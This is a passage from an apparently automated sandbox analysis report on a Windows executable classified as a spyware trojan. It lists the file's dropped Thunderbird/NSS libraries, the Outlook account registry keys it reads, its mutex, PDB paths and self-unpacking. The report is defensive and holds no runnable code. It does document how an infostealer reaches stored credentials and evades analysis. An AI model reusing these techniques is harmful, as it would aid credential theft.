                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0043AFE4
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00432F9D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0040D407
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0041D425
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00427858
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0042982C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0040DE52
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0041DE02
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_004400D5
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00448140
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0044617A
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00458139
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00458259
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0042837C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0041C315
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_004623DB
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_004203FE
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00440390
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0043A492
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0041656D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00440AC0
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00414A8F
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0045AC8D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00416E0E
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0041AE2C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_0044AF58
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: String function: 004656D0 appears 127 times
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: String function: 0044CDB9 appears 33 times
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: String function: 0043DE50 appears 40 times
                      Source: sqlite3.dll.1.drStatic PE information: Number of sections : 18 > 10
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221075413.000000006E2FB000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220859964.000000006E1A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000003.217738997.000000004C8D5000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220053335.0000000002750000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: KnZsSmDyF3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/66@1/2
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Code function: 1_2_00427783 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeMutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Command line argument: MF 1_2_00464D40
                      Source: KnZsSmDyF3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
                      Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: sqlite3.dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: KnZsSmDyF3.exeVirustotal: Detection: 62%
                      Source: KnZsSmDyF3.exeMetadefender: Detection: 28%
                      Source: KnZsSmDyF3.exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: KnZsSmDyF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
                      Source: Binary string: .C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
                      Source: Binary string: C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

                      Data Obfuscation:

                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe; Unpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe; Unpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack
                      Source: ucrtbase.dll.1.dr; Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe; Code function: 1_2_004317EF LoadLibraryA,GetProcAddress,FreeLibrary,1_2_004317EF
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /4
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /19
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /31
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /45
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /57
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /70
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /81
                      Source: sqlite3.dll.1.dr; Static PE information: section name: /92
                      Source: AccessibleHandler.dll.1.dr; Static PE information: section name: .orpc
                      Source: AccessibleMarshal.dll.1.dr; Static PE information: section name: .orpc
                      Source: IA2Marshal.dll.1.dr; Static PE information: section name: .orpc
                      Source: lgpllibs.dll.1.dr; Static PE information: section name: .rodata
                      Source: MapiProxy.dll.1.dr; Static PE information: section name: .orpc
                      Source: MapiProxy_InUse.dll.1.dr; Static PE information: section name: .orpc
                      Source: mozglue.dll.1.dr; Static PE information: section name: .didat
                      Source: msvcp140.dll.1.dr; Static PE information: section name: .didat
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe; Code function: 1_2_0046C54A pushad ; retf 1_2_0046C701
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exe; Code function: 1_2_0046C702 pushad ; retf 1_2_0046C701
                      Source: initial sample; Static PE information: section name: .text entropy: 7.91913577979